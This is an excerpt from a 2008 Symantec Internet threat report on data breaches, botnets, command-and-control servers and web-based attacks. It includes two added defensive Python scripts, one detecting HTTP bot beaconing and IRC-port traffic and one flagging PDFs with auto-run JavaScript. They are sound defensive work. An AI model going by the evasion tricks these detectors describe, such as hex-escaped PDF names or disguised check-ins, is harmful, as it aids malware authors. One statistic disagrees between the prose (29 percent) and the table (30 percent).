    Data breaches that could lead to identity theft, by sector

    Identity theft continues to be a high-profile security issue, particularly for organizations that store and manage large amounts of personal information. Based on the most recent information available for 2007, roughly 8.4 million U.S. residents were victims of identity theft, which represents approximately 3 percent of the adult population.40 Not only can compromises that result in the loss of personal data undermine customer and institutional confidence, cause costly damage to an organization's reputation, and be costly for individuals to recover from the resulting identity theft, they can also be financially costly to organizations. In 2008, the average cost per incident of a data breach in the United States was $6.7 million, an increase of 5 percent from 2007, and lost business amounted to an average of $4.6 million.41 Organizations can also be held liable for breaches and losses, which may result in fines or litigation.42

    37 See http://www.vnunet.com/vnunet/news/2207878/china-cracks-web-porn and http://english.gov.cn/2008-03/29/content_931872.htm
    38 http://www.theglobeandmail.com/servlet/story/RTGAM.20080212.wgtchina0212/BNStory/Technology/home
    39 http://www.point-topic.com
    40 http://www.privacyrights.org/ar/idtheftsurveys.htm#Javelin2007
    41 http://www.encryptionreports.com/download/Ponemon_COB_2008_US_090201.pdf
    42 http://www.fsa.gov.uk/pages/Library/Communication/PR/2007/021.shtml


    Using publicly available data, Symantec has determined the sectors that were most often affected by these breaches and the most common causes of data loss.43 This discussion will also explore the severity of the breaches by measuring the total number of identities exposed to attackers, using the same publicly available data.44

    It should be noted that some sectors may need to comply with more stringent reporting requirements for data breaches than others. For instance, government organizations are more likely to report data breaches, either because of regulatory obligations or in conjunction with publicly accessible audits and performance reports.45 Conversely, organizations that rely on consumer confidence may be less inclined to report such breaches for fear of a negative consumer, industry, or market reaction. As a result, sectors that are not required or encouraged to report data breaches may be under-represented in this data set.

    In 2008, the education sector represented the highest number of known data breaches that could lead to identity theft, accounting for 27 percent of the total (figure 4). This is a slight increase from 2007, when the education sector also ranked first with 26 percent of the total.

    [Figure 4: two pie charts, "Data breaches" and "Identities exposed", each broken down by sector: Health care, Education, Government, Financial, Retail/wholesale, Arts/media, Manufacturing, Telecom, Business consulting, Insurance, Biotech/pharmaceutical, Utilities/energy, Other. The individual slice values are not recoverable from this copy; the text gives education 27% of breaches and 4% of identities, government 20% and 17%, and health care 15% and 5%.]

    Figure 4. Data breaches that could lead to identity theft by sector and identities exposed by sector46

    Source: Based on data provided by OSF DataLoss DB

    43 Open Security Foundation (OSF) DataLoss DB, see http://datalossdb.org
    44 An identity is considered to be exposed if personal or financial data related to the identity is made available through the data breach.
    45 Cf. http://www.privacyrights.org/fs/fs6a-facta.htm and http://www.cms.hhs.gov/HealthPlansGenInfo/12_HIPAA.asp
    46 Due to rounding, percentages might not equal 100 percent.


    Educational institutions store a large amount of personal information on students, faculty, and staff that could be used for the purposes of identity theft, including government-issued identification numbers, names, and addresses. Finance departments in these institutions also store bank account information for payroll and may hold credit card information for people who use this method to pay for tuition and fees. These institutions, particularly large universities, often consist of many autonomous departments within which sensitive personal identification information may be stored in separate locations and be accessible to many people. This may increase the opportunities for attackers to gain unauthorized access to the data, since it is harder to standardize security, to educate everyone with access to the data on the policies, and to control access to these dispersed databases.

    Despite the high number of data breaches that occurred in the education sector during 2008, it accounted for only 4 percent of all identities exposed during the period and ranked seventh (figure 4). This may be because educational institutions have relatively smaller databases than those of financial or government institutions and, hence, fewer identities are exposed in a data breach. One of the largest universities in the United States accounted for fewer than 80,000 students and employees, while financial and government institutions may store information on millions of people.47

    Also, one-third of the data breaches in the education sector this period were caused by the theft or loss of computers or data-storage devices. As such, data breaches in the education sector in this reporting period were not as likely to result in wide-scale identity theft because they exposed fewer identities: these types of breaches only expose the limited amount of data that is stored on the devices.

    In 2008, the government sector ranked second and accounted for 20 percent of data breaches that could lead to identity theft. This is a decrease from the previous year, when the government sector represented 23 percent of the total, though it still ranked second. This trend is reinforced by the annual Federal Computer Security report card, where the number of government agencies with a failing grade decreased by almost half.48 The health care sector ranked third in 2008, accounting for 15 percent of data breaches that could lead to identity theft. It also ranked third in 2007, accounting for 14 percent.

    Government and health care organizations, like educational institutions, store large amounts of information that could be used for identity theft. Similar to the education sector, these organizations often consist of numerous autonomous departments that store sensitive personal information in separate locations accessible to numerous people. As a consequence, these organizations face the same security and control issues as educational institutions. Furthermore, health care organizations store sensitive medical information in addition to personal information, which could result in even more damaging breaches of privacy.

    The government sector ranked third for identities exposed during 2008, accounting for 17 percent of the total, while the health care sector ranked sixth, accounting for 5 percent of the total. As with the education sector, data breaches within the health care sector resulted in a relatively low number of identities exposed.

    47 http://www.osu.edu/osutoday/stuinfo.php
    48 http://republicans.oversight.house.gov/media/PDFs/Reports/FY2007FISMAReportCard.pdf


    Data breaches that could lead to identity theft, by cause

    In 2008, the primary cause of data breaches that could facilitate identity theft was the theft or loss of a computer or other medium on which data is stored or transmitted, such as a USB key or a back-up medium.49 Theft or loss made up 48 percent of all data breaches in 2008, a decrease from the previous reporting period, when it accounted for 52 percent of all reported breaches (figure 5).

    [Figure 5: pie charts of data breaches that could lead to identity theft, by cause, and of identities exposed, by cause. Only the slice labels "Insider 4%" and "Unknown" survive in this copy; the text gives theft or loss 48% of breaches, insecure policy 21% of breaches and 8% of identities, and hacking 17% of breaches and 22% of identities.]


    To protect against data theft or loss, organizations should restrict the use of outside personal storage devices within the network, monitor the usage of such hardware within their perimeter, and educate employees on proper usage. Organizations should also include reviews and audits of electronic documents used by employees upon their leaving the company. In a recent study, 59 percent of employees admitted to taking company information, such as email addresses, customer contact information, employee records, and financial records, when leaving the organization.52 Of these former employees, 79 percent took the information without permission from the company. In 92 percent of the instances the information was taken on disk, while in 73 percent it was on removable drives. It is worth noting that only 15 percent of the companies polled had conducted a review or audit of electronic documents taken by employees. Also, sensitive data should be strongly encrypted on any laptop or storage device that may be used outside of the enterprise, so that a lost or stolen device exposes ciphertext rather than identities.

    The second most common cause of data breaches that could lead to identity theft during 2008 was insecure policy, which represented 21 percent of all incidents. A data breach is considered to be caused by insecure policy if it can be attributed to a failure to develop, implement, and/or comply with adequate security policy. In 2007, insecure policy also ranked second, accounting for 28 percent of such data breaches. The decrease in the number of such breaches may be due to organizations becoming more diligent and introducing stronger security policies, such as limiting access to sensitive information to required personnel and documenting document transfers. Insecure policy accounted for only 8 percent of exposed identities in 2008, so each breach exposed a relatively small number of identities. Although breaches caused by insecure policy in 2008 were not likely to result in wide-scale identity theft, they still exposed approximately 6.5 million identities.53

    In 2008, hacking was the third leading cause of data breaches that could lead to identity theft, accounting for 17 percent of the total. A data breach is considered to be caused by hacking if data related to identity theft was exposed by attackers external to the organization gaining unauthorized access to its computers or networks. Hacking also ranked third in 2007, accounting for 14 percent of breaches that could facilitate identity theft. Hacking is more purpose-driven than insecure policy, theft, or loss: in 2008, over half of the breaches that exposed credit card information were due to hacking. Attackers can take advantage of site-specific and Web-application vulnerabilities to gain access to networks and steal personal information. For this discussion, Symantec considers hacking to be an intentional act with the defined purpose of stealing data that can be used for identity theft or other fraud.

    Hacking ranked second for identities exposed in 2008, with 22 percent; this is a large decrease from 2007, when hacking accounted for 62 percent of total identities exposed. The contributing factor for its high ranking in 2007 was a single large breach in which data on over 94 million credit cards was stolen by attackers who hacked into a company's database through unencrypted wireless transmissions and installed programs to capture credit card information.54 It is estimated that between $63 million and $83 million in credit card fraud across 13 countries can be attributed to this single data breach.55

    In 2008, two breaches contributed significantly to the high ranking of hacking in this metric. In the first, confidential information on six million Chileans was illegally obtained from government databases by a hacker who publicly posted the information afterward; in the second, credit card information for 4.2 million customers was stolen from a U.S.-based grocery chain by hackers monitoring the credit authorization process.56 Because attackers who use hacking to steal personal financial information are motivated by profit, the impact of data breaches due to hacking may be severe: they are likely to result in large-scale fraud and high financial cost to affected organizations, credit card issuers, and consumers.

    52 http://www.symantec.com/about/news/release/article.jsp?prid=20090223_01
    53 http://datalossdb.org
    54 http://www.msnbc.msn.com/id/21454847/
    55 http://www.securityfocus.com/news/11493

    Even though they constitute one of the most challenging issues faced by organizations, data breaches that could lead to identity theft are mostly preventable. For any department that manages or requires access to sensitive information, organizations should develop strong security policies, such as strongly encrypting all such data, ensuring there are controls in place that restrict access to it to required personnel, and providing education and resources for all employees on proper security procedures. Network administrators should closely monitor network traffic and track activity to ensure that there is no illegal access to databases, as well as test security processes and systems regularly to ensure their integrity. Organizations should include these steps as part of a broader security policy, and ensure that the policy is implemented and enforced to protect all sensitive data from unauthorized access.

    Bot-infected computers

    Bots are programs that are covertly installed on a user's machine in order to allow an attacker to remotely control the targeted system through a communication channel, such as Internet relay chat (IRC), P2P, or HTTP. These channels allow the remote attacker to control a large number of compromised computers over a single, reliable channel in a botnet, which can then be used to launch coordinated attacks.

    Bots allow for a wide range of functionality, and most can be updated to assume new functionality by downloading new code and features. Attackers can use bots to perform a variety of tasks, such as setting up denial-of-service (DoS) attacks against an organization's website, distributing spam and phishing attacks, distributing spyware and adware, propagating malicious code, and harvesting confidential information from compromised computers that may be used in identity theft, all of which can have serious financial and legal consequences. Bots are also inexpensive and relatively easy to propagate. In 2008, Symantec observed underground economy advertisements for as little as $0.04 per bot; this is much cheaper than in 2007, when $1 was the cheapest price advertised for bots. Botnets with a decentralized C&C model are favored by attackers because they are difficult to disable and, most importantly, can be lucrative for their controllers. In one example, a bot owner arrested in New Zealand admitted to earning $21,500 over a two-year span for his activities.57

    A bot-infected computer is considered active on a given day if it carries out at least one attack on that day. This does not have to be continuous; a single such computer can be active on a number of different days. A distinct bot-infected computer is a distinct computer that was active at least once during the period. In 2008, Symantec observed an average of 75,158 active bot-infected computers per day (figure 6), a 31 percent increase from 2007. Symantec also observed 9,437,536 distinct bot-infected computers during this period, a 1 percent increase from 2007.

    56 Cf. http://news.bbc.co.uk/1/hi/world/americas/7395295.stm or http://www.msnbc.msn.com/id/23678909/
    57 http://www.itworld.com/security/58670/bot-master-sees-himself-next-bill-gates


    [Figure 6: line chart of active bot-infected computers (y-axis 0 to 120,000) by date, Jan 3, 2007 to Dec 31, 2008; series: median daily active bots, and a 4-period moving average.]

    Figure 6. Active bot-infected computers, by day

    Source: Symantec

    The decrease in active bot-infected computers at the beginning of 2008 may be due to the reduction in size of the botnet associated with the Peacomm Trojan.58 The number of bot-infected computers in that botnet was reduced to 5 percent of its previous estimated size, from 2 million bot-infected computers to 100,000.59 In addition, as stated in Malicious activity by country, the shutdown of two U.S.-based hosting companies responsible for hosting bot C&C servers for a number of major botnets likely contributed to the decreases in active bot-infected computers in September and November 2008. After the shutdown in September, major botnets, including Srizbi and Pandex,60 were able to find alternate hosting, which brought the number of active bot-infected computers back up to pre-shutdown levels. However, the shutdown in November severely crippled Srizbi and Ozdok, and as a consequence competing botnets, including Pandex, were able to fill the void.61

    Although the number of active bot-infected computers decreased at the end of the year, it is assumed that bot owners will seek out new hosts to get their botnets back online, and bot numbers are expected to rise again in 2009.62 One lesson of the activity in 2008 is that botnets can be crippled by identifying and shutting down the hosts of their bot C&C servers, but that this strategy is difficult to sustain given the many hosting options around the world that bot controllers have at their disposal.

    58 Also known as the Storm botnet.
    59 http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 32
    60 http://www.symantec.com/security_response/writeup.jsp?docid=2007-042001-1448-99
    61 http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 25-26
    62 http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_12-2008.en-us.pdf


    Bot command-and-control servers

    Symantec tracks the number of bot C&C servers globally because these are what bot owners use to relay commands to the bot-infected computers on their networks. For the first time, in this volume of the Symantec Global Internet Security Threat Report, bot C&C servers controlled over HTTP are included in this analysis alongside IRC bot C&C servers.63 This change in measurement was made because bot owners are shifting away from traditional IRC C&C communication frameworks and toward managing their botnets through HTTP C&C servers. In 2008, Symantec identified 15,197 distinct new bot C&C servers (figure 7), of which 43 percent were over IRC channels and 57 percent over HTTP.

    IRC 43%    HTTP 57%

    Figure 7. Bot command-and-control servers, by type

    Source: Symantec

    Bot owners are moving away from traditional IRC-based botnets because these are easier to detect, track, filter, and block than botnets based on HTTP traffic. HTTP communications can be used to disguise bot traffic among other Web traffic, making it difficult to distinguish malicious traffic from legitimate HTTP traffic. (Most HTTP bot transmissions are also encrypted to avoid detection.) To filter the traffic, organizations would have to inspect the encrypted HTTP traffic and identify and remove bot-related traffic while still allowing legitimate traffic to pass through. Because of this, it is very difficult to monitor and disable an HTTP bot C&C structure. It is also unreasonable to block HTTP traffic outright, since organizations depend on legitimate HTTP traffic to conduct day-to-day business. Bot owners have also been switching away from P2P for bot C&C communications because such traffic is more easily detected, owing to the ports it uses. Moreover, many enterprises and other organizations block P2P ports to prevent such high-bandwidth traffic from entering their networks.

    63 Not included in this measure are bot C&C servers over P2P protocols; also, as this is the first report in which HTTP bot C&C servers are included in this analysis, 2007 comparisons are unavailable.
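    The paragraph above explains why HTTP C&C is hard to filter by content. What defenders do instead is look at the shape of the traffic. The following Python script is an added example, not Symantec's detection logic or code from the report: it surfaces HTTP beaconing without decrypting anything, by finding clients that poll the same host on a near-constant period with near-constant request sizes, and for comparison flags connections to the well-known IRC ports, which is why IRC-based botnets are the easier ones to catch. The log format, field names, hostnames (on the reserved .test domain) and thresholds are all assumptions constructed for the example; the sample lines are made up.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Common IRC ports (assumption; tune for your environment).
IRC_PORTS = {6667, 6697}

# Constructed sample proxy/firewall log, one connection per line:
#   <ISO timestamp> <src_ip> <dst_host>:<dst_port> <bytes_sent> <user_agent>
# 10.0.0.5 polls one host every ~300 s with identical request sizes (beacon),
# 10.0.0.7 browses a news site at irregular intervals (legitimate),
# 10.0.0.9 opens a connection to an IRC port.
SAMPLE_LOG = """\
2008-11-11T09:00:00 10.0.0.5 update.example-cdn.test:80 312 Mozilla/4.0
2008-11-11T09:05:01 10.0.0.5 update.example-cdn.test:80 312 Mozilla/4.0
2008-11-11T09:10:00 10.0.0.5 update.example-cdn.test:80 312 Mozilla/4.0
2008-11-11T09:14:59 10.0.0.5 update.example-cdn.test:80 312 Mozilla/4.0
2008-11-11T09:20:01 10.0.0.5 update.example-cdn.test:80 312 Mozilla/4.0
2008-11-11T09:25:00 10.0.0.5 update.example-cdn.test:80 312 Mozilla/4.0
2008-11-11T09:00:12 10.0.0.7 news.example.test:80 1840 Mozilla/5.0
2008-11-11T09:03:40 10.0.0.7 news.example.test:80 722 Mozilla/5.0
2008-11-11T09:41:05 10.0.0.7 news.example.test:80 2230 Mozilla/5.0
2008-11-11T10:12:50 10.0.0.7 news.example.test:80 515 Mozilla/5.0
2008-11-11T09:07:33 10.0.0.9 irc.example-chat.test:6667 95 -
"""


def parse_line(line):
    """Split one log line into (timestamp, src_ip, dst_host, dst_port, bytes_sent)."""
    ts, src, dst, sent, _agent = line.split(maxsplit=4)
    host, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, host, int(port), int(sent)


def analyze(log_text, min_hits=5, max_cv=0.10):
    """Return a list of findings, one per suspicious (client, destination) pair.

    Beacon heuristic: with at least `min_hits` requests from one client to one
    host, compute the gaps between consecutive requests; a coefficient of
    variation (stdev / mean) at or below `max_cv` means the client is calling
    home on a timer rather than being driven by a person.
    """
    sessions = defaultdict(list)
    irc_pairs = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, host, port, sent = parse_line(line)
        if port in IRC_PORTS:
            irc_pairs.add((src, host, port))
            continue
        sessions[(src, host, port)].append((ts, sent))

    findings = [{"src": s, "dst": h, "port": p, "reason": "irc-port"}
                for s, h, p in sorted(irc_pairs)]

    for (src, host, port), events in sessions.items():
        if len(events) < min_hits:
            continue  # too few requests to judge periodicity
        events.sort()
        gaps = [(b - a).total_seconds() for (a, _), (b, _) in zip(events, events[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({
                "src": src, "dst": host, "port": port, "reason": "beacon",
                "hits": len(events), "period_s": round(avg), "cv": round(cv, 4),
                # a bot's check-in is usually the same few bytes every time
                "distinct_sizes": len({sent for _, sent in events}),
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

    Run stand-alone, it reports one beacon for 10.0.0.5 (period 300 s, coefficient of variation about 0.004, a single request size) and one IRC-port connection for 10.0.0.9; the browsing client 10.0.0.7 is not flagged. In practice the periodicity test needs an allow-list for legitimate pollers (update services, mail clients, monitoring agents), and its output goes to an analyst rather than straight to a block rule, for exactly the reason the text gives: blocking HTTP wholesale is not an option.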


    Symantec also observed an average of 42 new active bot C&C servers per day in 2008, of which 18 were IRC-based and 24 were HTTP (figure 8). The three largest botnets identified by Symantec in 2008, Srizbi, Rustock, and Pandex, are all HTTP-based.

    [Figure 8: line chart of new active bot command-and-control servers per day (y-axis 0 to 60) by date, Jan 2, 2008 to Dec 31, 2008; series: HTTP, IRC, 3-period moving average (HTTP), 3-period moving average (IRC).]

    Figure 8. Bot command-and-control servers, by day

    Source: Symantec

    The drop in new and active HTTP bot C&C servers in February 2008 is likely due to the C&C servers of a major HTTP-based botnet, Ozdok, going offline for 10 days during that month.64 The significant reductions in September and November 2008 are likely due to the shutdown of the two U.S.-based ISPs noted previously in this discussion. The September shutdown resulted in a dramatic decrease in activity associated with the Srizbi and Pandex botnets.65 As noted, it is assumed that these botnets found alternate hosting, which would explain the subsequent rise in activity. The second shutdown, in November, resulted in a 30 percent decrease in overall bot traffic and is thought to have severely weakened two of the largest botnets, Srizbi and Rustock.66 The significant drop in new and active HTTP bot C&C servers in November may be because one of these ISPs was allegedly hosting a large number of bot C&C servers for Srizbi and Rustock, and the bots were hard-coded to connect to those servers.67 It was estimated that the Srizbi botnet had 300,000 bots prior to the shutdown68 and that the Rustock botnet had included over 150,000 bots.69

    64 http://www.scmagazineus.com/TRACE-Six-botnets-generate-85-percent-of-spam/article/107603/
    65 http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 25
    66 http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 26
    67 http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_12-2008.en-us.pdf
    68 http://knowledgexchange.techtarget.com/security-bytes/srizbi-botnet-is-the-biggest-but-does-size-matter/
    69 http://www.scmagazineus.com/The-Rustock-botnet-spams-again/article/112940/


    Top Web-based attacks

    The widespread deployment of Web applications, along with the ubiquity of easy-to-exploit Web application security vulnerabilities, has resulted in the prevalence of Web-based threats. Attackers wanting to take advantage of client-side vulnerabilities no longer need to actively compromise specific networks to gain access to the computers on them. Instead, they now focus on attacking and compromising websites in order to mount additional, client-side attacks.

    These attack types can be found globally, and Symantec identifies each by an associated distinct detection signature. Most attack types target specific vulnerabilities or weaknesses in Web browsers or in other client-side applications that process content originating from the Web. This metric assesses the top distinct Web-based attacks originating from compromised legitimate sites and from malicious sites that have been created to intentionally target Web users.

    The attacks discussed can involve social engineering to entice a victim to view a malicious website, but most attacks exploit trusted high-traffic websites. When the user visits a compromised website, a number of attack methods may be used. Malicious content from the website can directly exploit a vulnerability in the browser, a browser plug-in, or a desktop application. Such an attack may require very little action or awareness from the user visiting the site from which the attack originates; in the case of a drive-by download, the attack occurs without any action required from the user.70

    Attackers also use malicious websites for compromises, such as misleading the user into directly authorizing a specific technology that then downloads malicious code, or prompting the user to click on a pop-up or banner ad. Attackers can also redirect all traffic from a legitimate website to a malicious website from which the user's computer is then attacked. In all of these types of Web-based attack, the user is unaware of the compromise. Once an attacker has compromised a website and injected malicious content, he or she can passively attack visitors of the compromised site. This type of attack is very effective for attackers because they only have to compromise one Web page in order to affect multiple users. When a user visits a compromised Web page, the attack is carried out through the user's browser.71 The attack will either target vulnerabilities in the browser itself or target third-party applications that are activated by the browser.

    All Web-based attack traffic goes through the HTTP or HTTPS protocols. The benefit of this for attackers is that it is unreasonable to block these protocols, because legitimate organizations depend on them for their day-to-day business. In addition, filtering a large volume of HTTP traffic would significantly slow throughput. HTTP traffic is also difficult to filter with intrusion detection/intrusion prevention systems (IDS/IPS) because it is difficult to distinguish malicious traffic from legitimate traffic, and because HTTP traffic can be encrypted, allowing attacks to be hidden among legitimate traffic.

    Attackers are not only employing manual methods to exploit these issues; they are also using automated tools, such as Neosploit,72 to exploit client-side vulnerabilities on a massive scale. Such toolkits are widely available and packaged so that people with minimal technical knowledge are able to use them effectively.

    70 A drive-by download is a download that occurs without a user's prior knowledge or authorization and does not require user action. Typically this is an executable file.
    71 Cf. the Vulnerability Trends section for discussion on compromises of websites with Web-based vulnerabilities.
    72 http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=Security&articleId=9115599&taxonomyId=17&pageNumber=1


    Another attraction of the Web for exploitation is the profusion of dynamic sites that use Web-based applications, such as forums, photo-sharing galleries, blogs, and online shopping applications. Dynamic sites are targets for attackers using bot-infected computers to propagate and host malicious content, since Web application and site-specific vulnerabilities can put these types of sites at risk.

    Attackers are also especially attracted to large, popular websites with trusted reputations. This is not only because a successful compromise can reach a greater number of people (who tend to place higher trust in legitimate websites and are thus more susceptible to attack), but also because, as noted, it may be difficult to block attacks on these sites using security tools without disrupting legitimate traffic.

    These developments and trends indicate that Web-based threats have not only become widespread, but have also increased in sophistication and severity. In particular, Symantec has noticed that botnets (such as Asprox, which was originally used for phishing scams) are being designed specifically to exploit cross-site scripting vulnerabilities and inject malicious code into compromised websites.73

    Many Web-based attacks exploit vulnerabilities that are considered medium severity. This means that they can compromise the account of the currently logged-in user, because the user does not need administrative privileges to run the affected applications. While the danger of client-side vulnerabilities may be limited by best practices, such as restricting Web applications at the administrative level, this is often unreasonable given how integral Web applications are to the delivery of content for many businesses. Medium-severity vulnerabilities affecting client or desktop applications are often sufficient for an attacker to mount successful attacks on single clients as well as at the enterprise level.

    In 2008, the top Web-based attack was associated with the Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness,74 which accounted for 29 percent of the total globally (table 3). The weakness allows attackers to install malicious files on a vulnerable computer when a user visits a website hosting an exploit. To carry out this attack, an attacker must exploit another vulnerability that bypasses Internet Explorer security settings, in order to execute the malicious files installed through the initial weakness. This issue was published on August 23, 2003, and fixes have been available since July 2, 2004. Since this was the top Web-based attack in 2008, it may indicate that many computers running Internet Explorer have not been patched or updated and are running with this vulnerability exposed.

    Rank   Web-based Attack                                                                Percentage
    1      Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness      30%
    2      Acrobat PDF Suspicious File Download                                            11%
    3      ANI File Header Size Buffer Overflow                                            7%
    4      Adobe SWF Remote Code Executable                                                7%
    5      Microsoft Internet Explorer DHTML CreateControlRange Code Executable            6%
    6      SnapShot Viewer ActiveX File Download                                           5%
    7      Microsoft Internet Explorer XML Core Services XMLHTTP Buffer Overload           4%
    8      Quicktime RTSP URI Buffer Overload                                              3%
    9      AOL SuperBuddy ActiveX Code Executable                                          3%
    10     Microsoft Internet Explorer WebViewFolderIcon ActiveX Control Buffer Overflow   2%

    Table 3. Top Web-based attacks

    Source: Symantec

    73 http://www.messagelabs.com/mlireport/MLIReport_Annual_2008_FINAL.pdf : p. 33
    74 Cf. http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=50031 or http://www.securityfocus.com/bid/10514


    A large number of exploits and malicious applications depend on this vulnerability as a common way of compromising computers, often in tandem with other known vulnerabilities. The amount of attack activity is therefore related to the cumulative number of exploits, attack toolkits, and worms targeting this vulnerability as one possible means of compromising computers. It is also likely that the large market share of Microsoft Internet Explorer plays a role in the popularity of this attack.75 While the vulnerability was patched in 2004, there are likely still enough unpatched computers affected by it for attackers to continue to benefit from its exploitation.

    The second most common Web-based attack in 2008 was related to malicious Adobe Acrobat PDF activity,76 which accounted for 11 percent of Web-based attacks. Specifically, attempts to download suspicious PDF documents were observed. This may indicate attempts by attackers to distribute malicious PDF content to victims via the Web. The attack is not directly related to any specific vulnerability, although the contents of the malicious file would be designed to exploit an arbitrary vulnerability in an application that processes it, such as Adobe Acrobat Reader. A successful attack could ultimately compromise the integrity and security of an affected computer. This attack is assumed to be popular because of the common use and distribution of PDF documents on the Web, and because browsers can be set up to render a PDF document automatically by default. Specific exploit activity related to malicious PDF files was observed in 2008.77

    The Vulnerability Trends section of this report notes that the share of browser plug-in vulnerabilities affecting Adobe Acrobat Reader increased to 4 percent in 2008 from 1 percent in 2007, which shows that Adobe Acrobat Reader is increasingly targeted by attackers. In addition, the appearance of the Neosploit toolkit in 2008 may have contributed to the popularity of this type of attack, as that toolkit is designed to exploit vulnerabilities through PDF documents.78
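    The "suspicious PDF download" signature above is, as the text says, not tied to one vulnerability; what makes a PDF suspicious is the ability it gives the document to act on its own when opened. As an added example, not Symantec's signature or any product's code, the Python below is the kind of triage an analyst can run over a downloaded file: it decodes the hex escapes that PDF allows inside names (so /J#61vaScript is seen as /JavaScript, a common trick for evading plain string matching) and then counts the dictionary keys that let a PDF run code or fetch content. Both PDFs are constructed for the example and contain no exploit; the key list and the decision rule are heuristics chosen here, not a definitive indicator of malice.

```python
import re

# Constructed minimal PDFs (no exploit, just structure).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Same document, but the catalog runs a JavaScript action on open, and the
# action's type name is hex-escaped (/J#61vaScript) to dodge naive string matching.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert\\(1\\);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# PDF dictionary keys that let a document act on its own (heuristic list).
RISKY_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
               b"/Launch", b"/EmbeddedFile", b"/RichMedia", b"/URI")

# Triggers that fire without a click, and the payload types they can start.
AUTO_TRIGGERS = {"/OpenAction", "/AA"}
CODE_KEYS = {"/JavaScript", "/JS", "/Launch"}


def normalize_names(data):
    """Decode #XX hex escapes inside PDF names so /J#61vaScript becomes /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data):
    """Count occurrences of each risky name in the (normalised) PDF bytes."""
    norm = normalize_names(data)
    found = {}
    for name in RISKY_NAMES:
        # negative lookahead stops /JS from matching inside a longer name
        hits = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", norm))
        if hits:
            found[name.decode()] = hits
    return found


def is_suspicious(data):
    """Flag a PDF that can run code the moment it is opened or rendered."""
    found = triage_pdf(data)
    return bool(AUTO_TRIGGERS & found.keys()) and bool(CODE_KEYS & found.keys())


if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, triage_pdf(pdf), "->", is_suspicious(pdf))
```

    The check is deliberately a first pass: real malicious PDFs usually also compress or encode the object holding the script (FlateDecode streams, octal escapes in strings), so a full triage inflates streams before searching, and a PDF that merely contains /JavaScript is not proof of anything, which is why the decision pairs a code key with an automatic trigger rather than alerting on either alone.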

    In 2008, the third most common Web-based attack exploited the Microsoft Windows User32.DLL ANI File Header Handling Stack-Based Buffer Overflow Vulnerability,79 accounting for 7 percent of Web-based attacks. The ANI (animated cursor file) handler is a default component of the Microsoft Windows operating system and is used by a significant number of widely used Microsoft applications as well as by the Windows shell. If successfully exploited, the vulnerability allows an attacker to execute arbitrary code embedded in a malformed ANI file originating from the Web or from other sources. This vulnerability was published on January 11, 2005, and fixes have been available since that time; exploit code was publicly available the following day. As with the Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness, the prominence of this type of attack indicates that many computers are likely not being sufficiently patched and updated.

    Vulnerabilities such as those discussed here continue to generate a large amount of observed attack activity because they can be reliably exploited, which makes them candidates for automation. Despite the fact that fixes are available, as noted, there are likely still enough unpatched systems in existence that these attacks continue to enjoy success. When attacks prove successful, they are often adopted by a large number of malicious code variants and attack toolkits, which cumulatively creates a large amount of observed attack activity. It is also likely that older malicious code variants continue to attempt to exploit these vulnerabilities automatically as a means of propagation.

    75 http://marketshare.hitslink.com/browser-market-share.aspx?qprid=0&qpmr=100&qpdt=1&qpct=3&qptimeframe=Y&qpsp=2008&qpnp=2
    76 http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23153
    77 https://forums2.symantec.com/t5/Vulnerabilities-Exploits/Pdf-the-Word-for-Exploits/ba-p/305564#A141
    78 http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=Security&articleId=9115599&taxonomyId=17&pageNumber=2
    79 Cf. http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21719 or http://www.securityfocus.com/bid/12233


    Top countries of origin for Web-based attacks

    This metric assesses the top countries of origin for Web-based attacks against users in 2008 by determining the location of the computers from which the attacks occurred. Note that attackers, in order to hide their tracks, often redirect users through one or more servers that may be located anywhere in the world. Once an attacker has compromised a legitimate website, users who visit it can be attacked by several additional means. One is a drive-by download, which results in the installation of malicious code without the user's knowledge or consent. Another is to redirect the user to another website that hosts malicious code. Sites and servers hosting a variety of malicious exploits can be found worldwide, and multiple domains may be associated with one compromised site, which is then used to exploit one or more security vulnerabilities affecting client browsers.

